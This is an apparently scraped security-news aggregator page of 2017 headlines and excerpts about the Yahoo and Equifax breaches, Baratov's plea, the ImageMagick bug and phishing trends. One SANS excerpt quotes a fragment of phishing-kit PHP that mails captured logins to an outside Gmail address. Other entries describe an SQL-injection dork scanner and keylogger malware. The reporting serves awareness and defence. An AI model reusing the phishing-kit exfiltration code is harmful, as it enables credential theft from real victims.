What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
SecurityWeek.webp 2017-12-07 18:32:22 The Cumulative Effect of Major Breaches: The Collective Risk of Yahoo & Equifax (direct link) Until quite recently, people believed that a dizzying one billion accounts were compromised in the 2013 Yahoo! breach… and then it was revealed that the real number is about three billion accounts.  That raises the question: so what? Isn't all the damage from a four-year-old breach already done? Equifax Yahoo
Chercheur.webp 2017-12-02 01:15:15 Carding Kingpin Sentenced Again. Yahoo Hacker Pleads Guilty (direct link) Roman Seleznev, a Russian man who is already serving a record 27-year sentence in the United States for cybercrime charges, was handed a 14-year sentence this week by a federal judge in Atlanta for his role in a credit card and identity theft conspiracy that prosecutors say netted more than $50 million. Separately, a Canadian national has pleaded guilty to charges of helping to steal more than a billion user account credentials from Yahoo. Guideline Yahoo
SecurityWeek.webp 2017-11-29 18:39:21 Canadian Pleads Guilty to Hacking Yahoo (direct link) A 22-year-old Canadian national accused of carrying out attacks on Yahoo pleaded guilty on Tuesday to charges returned by a grand jury in the Northern District of California in February 2017. Guideline Yahoo ★★★
SecurityAffairs.webp 2017-11-29 10:40:24 Kazakhstan-born Canadian citizen pleads guilty to 2014 Yahoo hack, he admits helping Russian Intelligence (direct link) The Kazakhstan-born Canadian citizen Karim Baratov (22) has pleaded guilty to massive 2014 Yahoo hack that affected three billion accounts. The Kazakhstan-born Canadian citizen Karim Baratov (22) (Kay, a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), has pleaded guilty to massive 2014 Yahoo data breach that affected three billion accounts. Karim Baratov was arrested in Toronto at his home by the Toronto Police […] Guideline Yahoo
bleepingcomputer.webp 2017-11-29 07:48:19 The Least Significant Pawn in the Yahoo Hack Pleads Guilty (direct link) Karim Baratov, a 22-year-old Canadian national, pleaded guilty to charges related to the FBI's investigation into the Yahoo 2014 data breach. [...] Guideline Yahoo
The_Hackers_News.webp 2017-11-29 00:56:38 22-Year-Old Hacker Pleads Guilty to 2014 Yahoo Hack, Admits Helping Russian Intelligence (direct link) Karim Baratov, a 22-year-old Kazakhstan-born Canadian citizen, has pleaded guilty to hacking charges over his involvement in massive 2014 Yahoo data breach that affected all three billion yahoo accounts. In March, the US Justice Department announced charges against two Russian intelligence officers (Dmitry Dokuchaev and Igor Sushchin) from Russia's Federal Security Service (FSB) and two Guideline Yahoo
DarkReading.webp 2017-11-28 20:27:00 Suspect in Yahoo Breach Case Pleads Guilty (direct link) Karim Baratov admits he worked on behalf of Russia's FSB. Yahoo
bleepingcomputer.webp 2017-11-27 06:00:57 Yahoo Groups Plagued by Downtime, Technical Issues for Almost a Week (direct link) Yahoo Groups were nonfunctional all last week, according to customers complaining on the company's support forum and Twitter. [...] Yahoo
no_ico.webp 2017-11-14 01:15:54 Former Yahoo CEO's Testimony @ US Senate Hearing (direct link) The ISBuzz Post: This Post Former Yahoo CEO’s Testimony @ US Senate Hearing Yahoo
itsecurityguru.webp 2017-11-09 10:26:24 Difficult for Corporations to Stop Breaches (direct link) Yahoo’s former CEO testified at a Senate hearing stating it was tough for any corporation to stop or defend against cyberattacks that come from nation-states. ORIGINAL SOURCE: Data Breach Today Yahoo ★★
ZDNet.webp 2017-11-08 20:16:00 Equifax, Yahoo fail to answer the most basic questions during Senate hearing (direct link) Senators were left frustrated as Yahoo didn't know how it was hacked, and Equifax still didn't know who. Equifax Yahoo
DarkReading.webp 2017-11-08 12:19:00 Yahoo's Ex-CEO Mayer Calls Out Russian Hackers (direct link) Former Yahoo Chief Executive Marissa Mayer apologizes for massive data breach that exposed billions of user accounts. Yahoo
itsecurityguru.webp 2017-11-02 10:55:16 Marissa Mayer to Testify at Data Breach Senate Hearing (direct link) Ex-Yahoo! CEO Marissa Mayer will testify, alongside the current and past Equifax CEO’s, in front of Senators on Nov. 8th, on two massive data breaches. ORIGINAL SOURCE: Fortune Equifax Yahoo
itsecurityguru.webp 2017-11-01 11:39:51 Are you overlooking the chink in your cybersecurity armour? (direct link) In a landscape full of high-profile data breaches, such as Yahoo and Tesco Bank, we're seeing more and more organisations looking to bolster their defences in order to protect their business critical assets. However, are organisations overlooking the smaller, intermediate devices in their network that could provide an access point for the craftier cybercriminal? One ... Yahoo
Pirate.webp 2017-10-23 14:35:10 SQLiv – SQL Injection Dork Scanning Tool (direct link) SQLiv is a Python-based massive SQL Injection dork scanning tool which uses Google, Bing or Yahoo for targeted scanning, multiple-domain scanning or reverse domain scanning. SQLiv Massive SQL Injection Scanner Features: Both the SQLi scanning and domain info checking are done in a multiprocess manner so the script is super fast at scanning a lot of URLs. It's a fairly new tool and there are plans for more features and to add support for other search engines like DuckDuckGo. Yahoo
no_ico.webp 2017-10-23 12:34:42 20 Year Software: Engineering and Updates (direct link) Twenty years ago, Windows 95 was the most common operating system. Yahoo and Altavista were our gateways to the internet. Steve Jobs just returned to Apple. Google didn’t exist yet. America Online had just launched their Instant Messenger. IPv6 was coming soon. That’s part of the state of software in 1997, twenty years ago. We … Yahoo
The_Hackers_News.webp 2017-10-17 04:33:28 Microsoft Kept Secret That Its Bug-Tracking Database Was Hacked In 2013 (direct link) It was not just Yahoo among "Fortune 500" companies who tried to keep a major data breach incident secret. Reportedly, Microsoft had also suffered a data breach four and a half years ago (in 2013), when a "highly sophisticated hacking group" breached its bug-reporting and patch-tracking database, but the hack was never made public until today. According to five former employees of the Yahoo
Blog.webp 2017-10-12 06:23:52 In Post Password Era, Passwords are the Problem (direct link) The standard password has never been less effective or more susceptible to attacks. But some of the U.S.’s leading corporations say they’re also not ready to get rid of it.  Las Vegas, Nevada — Businesses knew that passwords were dead long before the theft of billions of user credentials from Yahoo! and information on more... Guideline Yahoo
no_ico.webp 2017-10-09 17:15:01 Yahoo! Data Breach Affected 3 Billion Users (direct link) The ISBuzz Post: This Post Yahoo! Data Breach Affected 3 Billion Users Yahoo
globalsecuritymag.webp 2017-10-05 15:40:26 (Déjà vu) Gemalto comments on the Yahoo security breach (direct link) Following the latest security breach disclosed by Yahoo, Gemalto has released the results of the Breach Level Index, a global database analysing publicly disclosed data breaches. The Breach Level Index reveals in particular that the 918 data breaches identified resulted in 1.9 billion compromised files worldwide during the first half of 2017. Compared with the last 6 months of 2016, the number of lost, compromised or stolen files saw a (...) - Malwares Yahoo
DarkReading.webp 2017-10-04 17:00:00 Yahoo, Equifax Serve as Cautionary Tales in Discerning Data Breach Scope (direct link) Both companies this week revealed that their previously disclosed breaches impacted a lot more people than previously thought. Equifax Yahoo
itsecurityguru.webp 2017-10-04 13:42:51 Every Yahoo account hacked from 2013 breach (direct link) It has been revealed that every user who had a Yahoo account in 2013 was likely to have been affected by the breach. ORIGINAL SOURCE: NPR Yahoo ★★★★★
Pirate.webp 2017-10-04 13:38:10 Yahoo hack: all 3 billion accounts affected (direct link) After the 2013 hack, Yahoo had eventually hinted, in veiled terms, that the number of compromised user accounts was 1 billion. However, the company has just admitted the terrible truth: it was in fact all 3 billion accounts (that is, every one of them) that were compromised! Yahoo
no_ico.webp 2017-10-04 12:00:53 Yahoo Breach Hit 3 Billion Records (direct link) The ISBuzz Post: This Post Yahoo Breach Hit 3 Billion Records Yahoo
01net.webp 2017-10-04 11:54:40 All Yahoo accounts were hacked in 2013! (direct link) Three billion accounts were compromised in the largest cyberattack in history. However, it is still unknown whether Russia is actually involved in this affair. Yahoo
Kaspersky.webp 2017-10-04 06:57:56 2013 Yahoo Breach Affected All 3 Billion Accounts (direct link) Yahoo on Tuesday released an update to its 2013 breach, notifying users that all 3 billion accounts in existence at the time were compromised. Yahoo
SecurityAffairs.webp 2017-10-04 05:46:37 Yahoo hack – All 3 Billion Yahoo accounts were hacked in 2013 attack (direct link) The Yahoo hack that occurred in 2013 is bigger than originally stated, Verizon confirmed that all 3 Billion Yahoo accounts were hacked in the attack. The Yahoo hack that occurred in 2013, the biggest known data breach suffered by a tech company, is bigger than originally stated. Verizon Communications, which acquired Yahoo for $4.48 billion in June, […] Yahoo
Chercheur.webp 2017-10-04 04:34:50 Fear Not: You, Too, Are a Cybercrime Victim! (direct link) Maybe you've been feeling left out because you weren't among the lucky few hundred million or billion who had their personal information stolen in either the Equifax or Yahoo! breaches. Well buck up, camper: Both companies took steps to make you feel better today. Yahoo! announced that, our bad!: It wasn't just one billion users who had their account information filched in its record-breaking 2013 data breach. It was more like three billion (read: all) users. Meanwhile, big three credit bureau Equifax added 2.5 million more victims to its roster of 143 million Americans who had their Social Security numbers and other personal data filched in a breach earlier this year. At the same time, Equifax's erstwhile CEO informed Congress that the breach was the result of even more bone-headed security than was first disclosed. To those still feeling left out by either company after this spate of news, I have only one thing to say (although I feel a bit like a broken record in repeating this): Assume you're compromised, and take steps accordingly. Equifax Yahoo
SecurityWeek.webp 2017-10-04 02:54:30 2013 Hack Hit All 3 Billion Yahoo Accounts: Company (direct link) Massive Breach Hits Yahoo Yahoo
grahamcluley.webp 2017-10-04 00:17:57 The biggest hack in history is actually three times bigger than we feared (direct link) Yahoo
The_Hackers_News.webp 2017-10-03 23:01:39 It's 3 Billion! Yes, Every Single Yahoo Account Was Hacked In 2013 Data Breach (direct link) The largest known hack of user data in the history just got tripled in size. Yahoo, the internet company that's acquired by Verizon this year, now believes the total number of accounts compromised in the August 2013 data breach, which was disclosed in December last year, was not 1 billion-it's 3 Billion. Yes, the record-breaking Yahoo data breach affected every user on its service at the Yahoo
BBC.webp 2017-10-03 21:46:47 Yahoo 2013 data breach hit 'all three billion accounts' (direct link) The internet giant says three billion user accounts were affected, more than originally thought. Yahoo
DarkReading.webp 2017-10-03 18:10:00 Yahoo: All 3 Billion Accounts Affected in 2013 Breach (direct link) Every single Yahoo account was affected in a 2013 data breach, bringing the total from 1 billion to 3 billion. Yahoo
bleepingcomputer.webp 2017-10-03 17:58:08 Yahoo Corrects 2013 Data Breach Announcement From One Billion To "All Users" (direct link) In a statement posted online today, Yahoo — now rebranded as Oath and part of Verizon — corrected the estimation on a security breach announced last year from the initial assessment of one billion to "all Yahoo user accounts." [...] Yahoo
AlienVault.webp 2017-09-15 13:00:00 Things I Hearted this Week (direct link) A new beginning, a refresh, or has nostalgia finally caught up? We’re changing the name of this weekly update back to “Things I Hearted this Week”. Here are some of the popular and not-so-popular security and technology stories that caught our fancy for your reading pleasure. “It’s the only and most fascinating read you need to keep up to date with your security needs.” – Someone I hired to say this from fiverr.com Equifax The big one on the tip of everyone’s tongue this week has been Equifax. There’s little value in repeating every interesting article that was published on this topic during the week. From Adrian Sanabria’s Savage Security blog telling us Equifax breached, no eyebrows raised. To Brian Krebs providing his characteristic in-depth review The Equifax Breach: What you should know. All the way to articles exposing the poor manner in which the company has decided to respond, we tested Equifax's data breach checker — and it's basically useless. There have been many large breaches, what makes Equifax largely different is that the details stolen weren’t things like usernames or passwords that could be easily changed. Rather it was users' names, date of birth, and social security numbers – which are almost impossible to change. Then there’s the case that a lot of the impacted individuals weren’t even customers of Equifax. They merely had their data held by the credit bureau. So it’s unlike, say, the Yahoo breach, where users can simply shut down their account and take their business elsewhere. All eyes will be on the regulators to see if they can get to the bottom of the mess, and levy appropriate penalties. Maybe it’s time for the US to crystallise data protection, much like GDPR is seeking to achieve across Europe. Chatbot to sue Equifax It turns out that if you want to sue Equifax, you can do so without involving a lawyer. 
The creator, Joshua Browder, originally developed the chatbot to help people appeal against parking enforcement tickets. But now it’s looking to take on the big one and sue Equifax for its colossal breach. Chatbot lets you sue Equifax for up to $25,000 without a lawyer | The Verge Legal technology: the rise of the chatbots | Law Gazette Artificial intelligence developed its own non-human language | The Atlantic Phishers targeting LinkedIn users via hijacked accounts As users, we’re often aware of the dangers that could arise from a poorly secured bank account, but we don’t often give as much thought to other accounts we own such as email or social media. While an individual may not find LinkedIn particularly interesting themselves beyond maintaining a professional presence, attackers look at such accounts differently and will leverage to their advantage wherever possible. Therefore it is important users take the right steps to protect all of their accounts and social media profiles as best as possible by using stro Equifax Yahoo
DarkReading.webp 2017-09-05 14:10:00 Judge Rules that Yahoo Breach Victims Can Sue (direct link) The 1 billion users who were victims in Yahoo's massive data breaches between 2013 and 2016 received court approval to move forward with their case. Yahoo
NakedSecurity.webp 2017-09-05 13:36:56 Yahoo! braces itself for enormous class-action suit over breaches (direct link) A court ruling means that Yahoo! and its parent company, Verizon, could end up paying a heavy price for the huge breaches that saw more than 1bn people's details compromised Yahoo
AlienVault.webp 2017-08-29 13:00:00 One Man Cyber Attacked 4,000 Companies; Don't Let It Happen to You (direct link) A cyber-attack over the past four months was discovered which targeted more than 4,000 companies, and successfully penetrated at least 14 of them. The targets were mainly in the oil and gas, mining, transportation, and construction sectors - in locations as diverse as Germany, Kuwait, UAE, Egypt, and Croatia. The malicious party was able to acquire sensitive financial data and remote control of endpoints. Some speculated that a sophisticated criminal organization might be behind the attack. However, it turned out that the attacker was a 20-year-old man from Nigeria, and he was hardly a cyber mastermind. In fact, it was not difficult for researchers to discover the culprit’s identity: “Following extensive research into the campaign, researchers have revealed the identity of the criminal behind it. He is a Nigerian national, working on his own. On his social media accounts, he uses the motto: ‘get rich or die trying.’” The attacker had sent very crudely written phishing emails with improper punctuation, which would've made me immediately suspicious if one had ended up in my inbox. Here's what was sent in the body of his emails: “Dear Sir/Ms,... Please confirm the receipt of this mail as we have sent several emails to your esteemed company. Find attach 2 pages of our purchase order request for the month of May, kindly send us PI signed and stamped also do advice bank details for LC processing. Thanks and Regards Nurafi -- Saudi Aramco P.O. Box 5000 Dhahran 31311, Saudi Arabia” The email attachment's file name was “Saudi Aramco Oil And Gas.rar,” and the 591.1 Kb file had NetWire, a remote access Trojan, and HawkEye, a commercial keylogger, bound to it. NetWire is considered to be the first multi-platform RAT malware. 
It's primarily designed to exploit weaknesses in point-of-sale systems, but can also acquire sensitive financial data from client machines which aren't part of a POS system. It's configured to be spread as an email attachment Trojan, where it can linger for months while undetected. HawkEye is another malware which is sold in the Dark Web to be distributed as an email attachment Trojan. Its payload is a DOCX file, which can then acquire email and web browser passwords and engage in keylogger spyware functions. The only thing the attacker did to obscure his location was to put “Saudi Arabia” in his emails. He used two free Yahoo webmail addresses, which made it easy for the researchers to trace him. Plus, the fact that he only used two email addresses also meant that the companies he was targeting could have easily blocked those addresses to avoid receiving email from that attacker again. Given the simplistic nature of this operation, it's really concerning that his victims were large companies, not small or medium sized businesses. It's often assumed that large companies are more likely to have CISOs and better security monitoring systems with technologies such as SIEM in their server rooms. It's surprising to hear about so many large organizations falling for such a pedestrian, script kiddie sort of attack. Here are lessons that can be learned from its success, which can help you be better prepared and avoid falling victim to similar attacks: Train all your employees and contractors who have business email accounts. Teach them about phishing. Tell them to never open email attachments from senders who aren't known to the company, and to never share financial details except with specific people. Avoid sharing sensitive data o Guideline Yahoo
DarkReading.webp 2017-08-23 18:35:00 Suspect in Yahoo Breach Pleads Not Guilty (direct link) Karim Baratov enters his plea in US Courts today, after waiving his extradition hearing in Canada last week. Yahoo
DarkReading.webp 2017-08-22 12:55:00 Yahoo Hack Suspect to be Extradited to US (direct link) Karim Baratov, accused of working with Russian intelligence for the 2014 Yahoo breach, has waived an extradition hearing. Yahoo
SecurityWeek.webp 2017-08-18 19:56:16 Accused Yahoo Hacker to be Handed Over to U.S. Marshals (direct link) A Canadian man accused of carrying out devastating cyberattacks on Yahoo waived his right to an extradition hearing on Friday and will soon be handed over to US marshals. Yahoo
NetworkWorld.webp 2017-06-25 08:42:00 Even weak hackers can pull off a password reset MitM attack via account registration (direct link) At the IEEE Symposium on Security and Privacy 2017, researchers from the College of Management Academic Studies in Israel presented an interesting paper on bad password reset processes, “The Password Reset MitM Attack” (pdf). It explains how a weak attacker could take over accounts by exploiting vulnerabilities in password reset procedures. They dubbed the attack: password reset man-in-the-middle (PRMitM). The researchers said Google is “extremely vulnerable” to PRMitM, but Facebook, Yahoo, LinkedIn, Yandex and other sites and email services are also vulnerable as well as mobile apps like Whatsapp, Snapchat and Telegram. Yahoo
ErrataRob.webp 2017-06-13 01:26:00 More notes on US-CERTs IOCs (direct link) Yet another Russian attack against the power grid, and yet more bad IOCs from the DHS US-CERT. IOCs are "indicators of compromise", things you can look for in order to see if you, too, have been hacked by the same perpetrators. There are several types of IOCs, ranging from the highly specific to the uselessly generic. A uselessly generic IOC would be like trying to identify bank robbers by the fact that their getaway car was "white" in color. It's worth documenting, so that if the police ever show up in a suspected cabin in the woods, they can note that there's a "white" car parked in front. But if you work bank security, that doesn't mean you should be on the lookout for "white" cars. That would be silly. This is what happens with US-CERT's IOCs. They list some potentially useful things, but they also list a lot of junk that wastes people's time, with little ability to distinguish between the useful and the useless. An example: a few months ago was the GRIZZLEYBEAR report published by US-CERT. Among other things, it listed IP addresses used by hackers. There was no description which would be useful IP addresses to watch for, and which would be useless. Some of these IP addresses were useful, pointing to servers the group has been using a long time as command-and-control servers. Other IP addresses are more dubious, such as Tor exit nodes. You aren't concerned about any specific Tor exit IP address, because it changes randomly, so has no relationship to the attackers. Instead, if you cared about those Tor IP addresses, what you should be looking for is a dynamically updated list of Tor nodes updated daily. And finally, they listed IP addresses of Yahoo, because attackers passed data through Yahoo servers. 
No, it wasn't because those Yahoo servers had been compromised, it's just that everyone passes things through them, like email. A Vermont power-plant blindly dumped all those IP addresses into their sensors. As a consequence, the next morning when an employee checked their Yahoo email, the sensors triggered. This resulted in national headlines about the Russians hacking the Vermont power grid. Today, the US-CERT made similar mistakes with CRASHOVERRIDE. They took a report from Dragos Security, then mutilated it. Dragos's own IOCs focused on things like hostile strings and file hashes of the hostile files. They also included filenames, but similar to the reason you'd noticed a white car -- because it happened, not because you should be on the lookout for it. In context, there's nothing wrong with noting the file name. But the US-CERT pulled the filenames out of context. One of those filenames was, humorously, "svchost.exe". It's the name of an essential Windows service. Every Windows computer is running multiple copies of "svchost.exe". It's like saying "be on the lookout for Windows". Yes, it's true that viruses use the same filenames as essential Windows files like "svchost.exe". That's, generally, something you should be aware of. But that CRASHOVERRIDE did this is wholly meaningless. What Dragos Security was actually reporting was that a "svchost.exe" with the file hash of 79ca89711cdaedb16b0ccccfdcfbd6aa7e57120a was the virus -- it's the hash that's the important IOC. Pulling the filename out of context is just silly. Luckily, the DHS also provides some of the raw information provided by Dragos. But even then, there's problems: they provide it in formatted Yahoo
DarkReading.webp 2017-06-07 13:30:00 Cybersecurity Stands as Big Sticking Point in Software M&A (direct link) The breach that was the fly in the ointment of the Yahoo-Verizon deal is one of many now surfacing as security of acquired firms starts to become a point of negotiation. Yahoo
SecurityWeek.webp 2017-06-05 16:41:54 Yahoo Pays Out Thousands of Dollars for Serious Flaws (direct link) Yahoo has awarded thousands of dollars to a couple of researchers who managed to find serious vulnerabilities in the company's systems. The bug bounty hunters published blog posts over the weekend describing their findings. Yahoo
SANS.webp 2017-06-02 08:23:48 Phishing Campaigns Follow Trends, (Fri, Jun 2nd) (direct link) Those phishing emails that we receive every day in our mailboxes are often related to key players in different fields: Internet actors: Google, Yahoo!, Facebook, ... Software or manufacturers: Apple, Microsoft, Adobe, ... Financial Services: Paypal, BoA, name your preferred bank, ... Services: DHL, eBay, ... But the landscape of online services is ever changing and new actors (and more precisely their customers) become new interesting targets. Yesterday, while hunting, I found for the first time a phishing page trying to lure the Bitcoin operator: BlockChain. Blockchain[1] is a key player in the management of [...] Hopefully, the webshellisn [...] $from = From: b hacker@forever.org\n $from .= MIME-Version: 1.0\r\n $from .= charset=ISO-8859-1\r\n if(@$_GET[accedi]==login){ mail(carlosromero19871@gmail.com header( Location: richiesta_otp.html }else{ Note that the login procedure on BlockChain is extremely strong: 2FA authentication and one-time link is sent via email to approve all login attempts. Be sure to activate them if you're a BlockChain customer. The fact that Bitcoins, the digital currency, is getting more and more popular makes it a new interesting target for attackers. And this is also the case in corporate environments: There is a trend in companies that make a reserve of Bitcoins to prevent possible Ransomware attacks![3] [1] https://www.blockchain.com [2] http://klimatika.com.ua/block/ [3] https://www.technologyreview.com/s/601643/companies-are-stockpiling-bitcoin-to-pay-off-cybercriminals/ Xavier Mertens (@xme) ISC Handler - Freelance Security Consultant (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Yahoo
Korben.webp 2017-05-30 08:13:01 Yahoo Pipes, the return of the clone that won't give up (direct link) I don't know if you remember, but Yahoo Pipes was a fantastic tool that let you take web data (RSS feeds, web pages, etc.) and process it all to produce custom content tailored to your needs. I used it a lot to produce homemade RSS feeds and > Read more This wonderful and unequalled article entitled: Yahoo Pipes, the return of the clone that won't give up; was published on Korben, the only site that loves you more than your parents do. Yahoo
Kaspersky.webp 2017-05-23 18:00:36 Yahoo Retires ImageMagick After Bugs Leak Server Memory (direct link) Researcher Chris Evans reported a new bug and showed how also used a previously known flaw in ImageMagick to leak Yahoo server data and steal images and authentication secrets. Yahoo
SecurityWeek.webp 2017-05-23 02:38:02 Yahoo Ditching ImageMagick Highlights Issues in Bug Responsibility Ecosystem (direct link) ImageMagick, an open source command line graphics file editor, has been retired by one of its major consumers: Yahoo. The product has been beset by flaws and bugs for several years, but this appears to have been one too many for Yahoo. Following discovery of a bleed vulnerability, Yahoo fixed it by retiring the product. Yahoo
The_Hackers_News.webp 2017-05-23 01:11:45 18-Byte ImageMagick Hack Could Have Leaked Images From Yahoo Mail Server (direct link) After the discovery of a critical vulnerability that could have allowed hackers to view private Yahoo Mail images, Yahoo retired the image-processing library ImageMagick. ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermark and tweak images. The tool is supported by PHP, Python, Ruby, Perl, C++, and many other programming languages. This Yahoo
Last update at: 2024-05-10 14:08:03